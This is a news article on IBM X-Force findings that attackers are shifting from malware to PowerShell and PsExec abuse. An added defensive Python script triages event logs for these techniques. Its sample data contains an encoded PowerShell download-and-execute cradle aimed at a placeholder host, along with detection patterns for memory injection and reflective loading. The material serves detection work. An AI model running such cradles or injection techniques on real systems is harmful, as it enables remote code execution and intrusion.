For many crooks, malware is out and PowerShell attacks are in, IBM says

Fifty-seven percent of the cyberattacks detected by IBM X-Force Threat Intelligence used common applications like PowerShell or PsExec, compared to 29 percent that used more traditional phishing attacks.
After combing a C2 server, researchers believe they've uncovered a broader espionage campaign. (Getty Images)

Digital thieves are ditching traditional forms of cybercrime in favor of more subtle techniques that apparently help them avoid detection, IBM says.

Scammers are moving away from the use of malicious software, opting instead to exploit administrative tools to target business and organizations, according to a report published Tuesday by the company’s X-Force Threat Intelligence team.

Nation-state hacking groups appear to have started the trend, but it seems to have spread throughout the broader cybercriminal black market. FireEye said in 2017 it detected a suspected Iranian group using similar techniques to collect reconnaissance about global critical infrastructure companies. IBM’s report says such tactics are everywhere now.

Fifty-seven percent of the attacks IBM detected used common, otherwise benign applications like PsExec or PowerShell, a tool that can execute code from memory. Just 29 percent used more traditional phishing attacks, IBM says. This tactic enables hackers to evade antivirus protection and other common security controls.
“PowerShell is useful in data collection and analysis, but it is also favored by malicious actors who use it to forego the file system and inject malicious code directly into memory, thus enhancing obfuscation, and often evading security controls designed to detect malware deployments,” the IBM report said.

IBM’s research dovetails with previous reports from other security companies that say they have noticed an uptick in attacks that don’t rely on the typical way of hacking targets: attaching malware to an email and hoping a recipient falls for it.

Symantec last month said it detected cybercriminals using a combination of techniques to infiltrate financial companies operating throughout West Africa. In that case, thieves used PowerShell but also relied on remote desktop protocols and Microsoft administration tools to break into target networks. This technique is sometimes known as “living off the land,” industry jargon for using legitimate tools for nefarious purposes.
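The defensive counterpart to the tactics described above (PowerShell loading code straight into memory or via encoded commands, and PsExec-style remote service installs) is telemetry that does not depend on a file landing on disk: PowerShell script block logging and service-installation events. The following is an added example, not code from IBM, Symantec or the article, that scores constructed Windows event log lines against a small set of living-off-the-land indicators. The log format, indicator patterns, weights and threshold are assumptions chosen for illustration, not a published detection rule.

```python
"""Added example (not from the IBM report or the CyberScoop article):
score constructed PowerShell script block (Event ID 4104) and service
install (Event ID 7045) log lines for living-off-the-land indicators
such as encoded commands, in-memory loading and PsExec-style services."""
import base64
import re

# Matches "-enc <base64>" style arguments; used both to decode the script
# and to swap the base64 blob out of the text before indicator matching.
ENC_RX = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# (name, compiled regex, weight). Patterns and weights are assumptions
# drawn from common detection content, not from the article.
INDICATORS = [
    ("encoded_command", re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I), 2),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    ("no_profile", re.compile(r"-nop\b|-noprofile\b", re.I), 1),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I), 2),
    ("reflective_load", re.compile(r"Reflection\.Assembly\]::Load|\[System\.Reflection\.Assembly\]", re.I), 3),
    ("memory_injection", re.compile(r"VirtualAlloc|WriteProcessMemory|CreateRemoteThread", re.I), 3),
    ("psexec_service", re.compile(r"PSEXESVC", re.I), 3),
]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or ""."""
    m = ENC_RX.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:
        return ""


def score_event(event):
    """Return (score, matched indicator names) for one parsed event."""
    text = event["text"]
    decoded = decode_encoded_command(text)
    if decoded:
        # Replace the base64 blob with the decoded script so the patterns
        # run over the real command rather than over base64 noise.
        text = ENC_RX.sub(lambda _m: "-EncodedCommand " + decoded, text)
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def parse_line(line):
    """Parse a constructed 'timestamp|source|event_id|text' log line."""
    ts, source, event_id, text = line.split("|", 3)
    return {"ts": ts, "source": source, "event_id": int(event_id), "text": text}


def triage(lines, threshold=3):
    """Return the events whose indicator score reaches the threshold."""
    flagged = []
    for line in lines:
        ev = parse_line(line)
        score, hits = score_event(ev)
        if score >= threshold:
            flagged.append({**ev, "score": score, "hits": hits})
    return flagged


# Constructed sample events (not real telemetry). The encoded payload is a
# download cradle pointing at a reserved .invalid host.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')".encode("utf-16-le")
).decode()
SAMPLE_LOG = [
    "2024-01-01T10:00:00|PowerShell|4104|Get-ChildItem C:\\Users | Measure-Object",
    f"2024-01-01T10:00:05|PowerShell|4104|powershell.exe -nop -w hidden -enc {ENCODED}",
    "2024-01-01T10:00:09|PowerShell|4104|[System.Reflection.Assembly]::Load($bytes)",
    "2024-01-01T10:00:12|System|7045|A service was installed in the system. Service Name: PSEXESVC",
    "2024-01-01T10:00:20|PowerShell|4104|Get-Process | Sort-Object CPU -Descending",
]

if __name__ == "__main__":
    for ev in triage(SAMPLE_LOG):
        print(ev["ts"], ev["event_id"], ev["score"], ev["hits"])
```

Running the block flags the encoded download cradle, the reflective assembly load and the PsExec service install while leaving the two ordinary administrative commands alone. The point of decoding the `-EncodedCommand` argument before matching is that file-less tradecraft of the kind the report describes leaves nothing for a file scanner to inspect, so the script block itself is the only artefact a defender gets to look at.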

In that vein, IBM also said the number of cryptojacking attacks — the subtle hijacking of enterprise computing power for cryptocurrency mining — nearly doubled the number of ransomware attacks in 2018. Stealing computing power to mine bitcoins is much less conspicuous than bullying a company for ransom. But there’s a cost on the companies nonetheless: IT teams might receive a $10 million cloud computing bill when they’re expecting to pay a fraction of that, Stan Black, chief security and information officer at Citrix, told CyberScoop in December.

“This is about someone stealing assets that I pay for,” he said.
